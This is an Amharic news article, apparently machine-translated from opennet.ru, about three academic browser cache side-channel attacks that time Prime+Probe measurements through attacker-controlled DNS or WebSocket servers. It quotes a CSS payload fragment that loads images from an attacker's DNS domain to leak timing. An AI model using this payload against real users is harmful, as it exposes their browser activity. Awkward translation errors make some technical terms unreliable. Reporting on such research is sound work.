የበርካታ የአሜሪካ፣ የእስራኤል እና የአውስትራሊያ ዩኒቨርሲቲዎች የተመራማሪዎች ቡድን ስለ ፕሮሰሰር መሸጎጫ ይዘቶች መረጃ ለማውጣት በድር አሳሾች ላይ የሚሰሩ ሶስት ጥቃቶችን ፈጥሯል። አንደኛው ዘዴ ጃቫ ስክሪፕት በሌለበት ብሮውዘር ውስጥ ይሰራል፣ሌሎች ሁለቱ ደግሞ ከጎን ቻናል ጥቃቶች የመከላከል ዘዴዎችን በማለፍ በቶር አሳሽ እና በዴተርፎክስ ውስጥ ጥቅም ላይ የሚውሉትን ጨምሮ። ጥቃቶቹን የሚያሳዩበት ኮድ እና ለጥቃቶቹ አስፈላጊ የሆኑ የአገልጋይ አካላት በ GitHub ላይ ታትመዋል።
የመሸጎጫውን ይዘት ለመተንተን ሁሉም ጥቃቶች የፕራይም ፕሮቤ ዘዴን ይጠቀማሉ ፣ ይህም መሸጎጫውን በመደበኛ የእሴቶች ስብስብ መሙላት እና በሚሞሉበት ጊዜ ለእነሱ የመድረሻ ጊዜን በመለካት ለውጦችን መፈለግን ያካትታል ። በአሳሾች ውስጥ የሚገኙትን የደህንነት ዘዴዎች ትክክለኛ የጊዜ መለኪያን ለማለፍ በሁለት አማራጮች በአጥቂው ቁጥጥር ስር ላለው ዲ ኤን ኤስ ወይም ዌብሶኬት አገልጋይ ይግባኝ ይግባኝ ማለት ሲሆን ይህም የተቀበሉትን ጊዜ መዝገብ ይይዛል። በአንድ መልክ፣ ቋሚ የዲ ኤን ኤስ ምላሽ ጊዜ እንደ የጊዜ ማጣቀሻ ጥቅም ላይ ይውላል።
በማሽን መማር ላይ የተመሰረተ የምደባ ስርዓት በመጠቀም ውጫዊ ዲ ኤን ኤስ ወይም ዌብሶኬት ሰርቨሮችን በመጠቀም የተደረጉ መለኪያዎች እስከ 98% እጅግ በጣም ጥሩ በሆነው ሁኔታ (በአማካይ 80-90%) ዋጋዎችን ለመተንበይ በቂ ነበሩ። የጥቃት ስልቶቹ በተለያዩ የሃርድዌር መድረኮች (ኢንቴል፣ ኤዲኤም ራይዘን፣ አፕል ኤም 1፣ ሳምሰንግ ኤግዚኖስ) ላይ ተፈትሸው ሁለንተናዊ መሆናቸውን ተረጋግጧል።
የመጀመሪያው የዲ ኤን ኤስ እሽቅድምድም ጥቃት የጃቫ ስክሪፕት ድርድሮችን በመጠቀም የPremium+Probe ዘዴን የሚታወቅ ትግበራን ይጠቀማል። ልዩነቶቹ የሚቀነሱት በውጫዊ ዲ ኤን ኤስ ላይ የተመሰረተ የሰዓት ቆጣሪ እና የሽብር ተቆጣጣሪ አጠቃቀም ሲሆን ይህም ከማይኖር ጎራ ምስልን ለመጫን ሲሞከር ነው። ውጫዊ ሰዓት ቆጣሪ የጃቫ ስክሪፕት ጊዜ ቆጣሪዎችን የሚገድቡ ወይም ሙሉ በሙሉ በሚያሰናክሉ አሳሾች ላይ የፕራይም ፕሮብ ጥቃትን ይፈቅዳል።
በተመሳሳዩ የኤተርኔት አውታረመረብ ውስጥ ላለው የዲ ኤን ኤስ አገልጋይ ፣ የሰዓት ቆጣሪው ትክክለኛነት በግምት 2 ms ያህል ነው ፣ ይህም የጎን ቻናል ጥቃትን ለመፈጸም በቂ ነው (ለማነፃፀር በቶር ብሮውዘር ውስጥ ያለው መደበኛ የጃቫ ስክሪፕት ጊዜ ቆጣሪ ትክክለኛነት ነው ። ወደ 100 ms ቀንሷል). ለጥቃቱ ፣ የዲ ኤን ኤስ አገልጋይ ቁጥጥር አያስፈልግም ፣ ምክንያቱም የክዋኔው አፈፃፀም ጊዜ ስለተመረጠ ከዲ ኤን ኤስ የምላሽ ጊዜ ቀደም ሲል የቼኩ ማጠናቀቂያ ምልክት ሆኖ ያገለግላል (የሽብር ተቆጣጣሪው የተቀሰቀሰ እንደሆነ ላይ በመመስረት) ቀደም ብሎ ወይም ከዚያ በኋላ, ከመሸጎጫው ጋር ስላለው የፍተሻ አሠራር ፍጥነት መደምደሚያ ቀርቧል).
ሁለተኛው የጥቃት ዘዴ "String and Sock" በጃቫስክሪፕት ዝቅተኛ ደረጃ ያላቸውን የድርድር አጠቃቀም የሚገድቡ የደህንነት ቴክኒኮችን ለማለፍ ያለመ ነው። ከመደርደር ይልቅ፣ String and Sock በጣም ትልቅ በሆኑ ሕብረቁምፊዎች ላይ ክዋኔዎችን ይጠቀማሉ፣ መጠናቸው የሚመረጠው ተለዋዋጭው ሙሉውን የ LLC መሸጎጫ (የመጨረሻ ደረጃ መሸጎጫ) ይሸፍናል። በመቀጠል, የ indexOf () ተግባርን በመጠቀም, ትንሽ ንኡስ ሕብረቁምፊ በሕብረቁምፊው ውስጥ ይፈለጋል, ይህም በመጀመሪያ በምንጭ ሕብረቁምፊ ውስጥ የለም, ማለትም. የፍለጋ ክዋኔው በጠቅላላው ሕብረቁምፊ ላይ መደጋገም ያስከትላል። የመስመሩ መጠን ከኤልኤልሲ መሸጎጫ መጠን ጋር ስለሚዛመድ መቃኘት ድርድሩን ሳይጠቀሙ የመሸጎጫ ቼክ ክዋኔን እንዲያደርጉ ያስችልዎታል። መዘግየቶችን ለመለካት ከዲ ኤን ኤስ ይልቅ በአጥቂው ቁጥጥር ስር ወዳለው የዌብሶኬት አገልጋይ ጥሪ ይደረጋል - የፍለጋ ስራው ከመጠናቀቁ በፊት እና በኋላ ጥያቄዎች ወደ መስመሩ ይላካሉ ፣ በዚህ መሠረት አገልጋዩ መሸጎጫውን ለመተንተን ጥቅም ላይ የዋለውን መዘግየት ያሰላል። ይዘቶች.
ሦስተኛው የ"CSS PP0" ጥቃት በኤችቲኤምኤል እና በሲኤስኤስ በኩል ይተገበራል፣ እና ጃቫስክሪፕት በተሰናከለ አሳሾች ውስጥ ሊሰራ ይችላል። ዘዴው ከ "String and Sock" ጋር ተመሳሳይ ነው, ነገር ግን ከጃቫስክሪፕት ጋር የተያያዘ አይደለም. በጥቃቱ ወቅት፣ ጭንብል በማድረግ የ CSS መራጮች ስብስብ ይፈጠራል። መሸጎጫውን የሚሞላው የመጀመሪያው ትልቅ ሕብረቁምፊ የተዘጋጀው በጣም ትልቅ የሆነ የክፍል ስም ያለው ዲቪ ታግ በመፍጠር ነው። በውስጡ የራሳቸው መለያ ያላቸው የሌሎች ዲቪስ ስብስብ አለ። እነዚህ ጎጆዎች እያንዳንዳቸው አንድ ንዑስ ሕብረቁምፊ የሚፈልግ መራጭ ያለው የራሱ የሆነ ዘይቤ አላቸው። አንድ ገጽ ሲሰራ አሳሹ መጀመሪያ የውስጥ ዲቪስን ለማስኬድ ይሞክራል፣ ይህም በትልቅ ረድፍ ላይ የፍለጋ ስራን ያስከትላል። ፍለጋው የሚካሄደው ሆን ተብሎ የጎደለ ጭንብል በመጠቀም ነው እና በጠቅላላው መስመር ላይ ወደ መደጋገም ይመራል፣ ከዚያ በኋላ “አይሆንም” የሚለው ሁኔታ ተቀስቅሷል እና የዘፈቀደ ጎራዎችን የሚያመለክት የጀርባ ምስል ለመጫን ይሞክራል። #pp:not([class*=’xjtoxg’]) #s0 {background-image: url(«https://qdlvibmr.helldomain.oy.ne.ro»);} #pp:not([class*=’gzstxf’]) #s1 {background-image: url(«https://licfsdju.helldomain.oy.ne.ro»);} … X X ...
ንዑስ ጎራዎች የሚቀርቡት በአጥቂው ዲ ኤን ኤስ አገልጋይ ነው፣ ይህም ጥያቄዎችን ለመቀበል መዘግየቶችን ሊለካ ይችላል። የዲ ኤን ኤስ አገልጋይ ለሁሉም ጥያቄዎች NXDOMAIN ያወጣል እና ትክክለኛ የጥያቄዎች ጊዜ ምዝግብ ማስታወሻ ይይዛል። የዲቪስ ስብስቦችን በማዘጋጀት ምክንያት የአጥቂው ዲ ኤን ኤስ አገልጋይ ተከታታይ ጥያቄዎችን ይቀበላል ፣ በመካከላቸው ያለው መዘግየቶች የመሸጎጫ ይዘቶችን ከመፈተሽ ውጤት ጋር ይዛመዳሉ።
ምንጭ: opennet.ru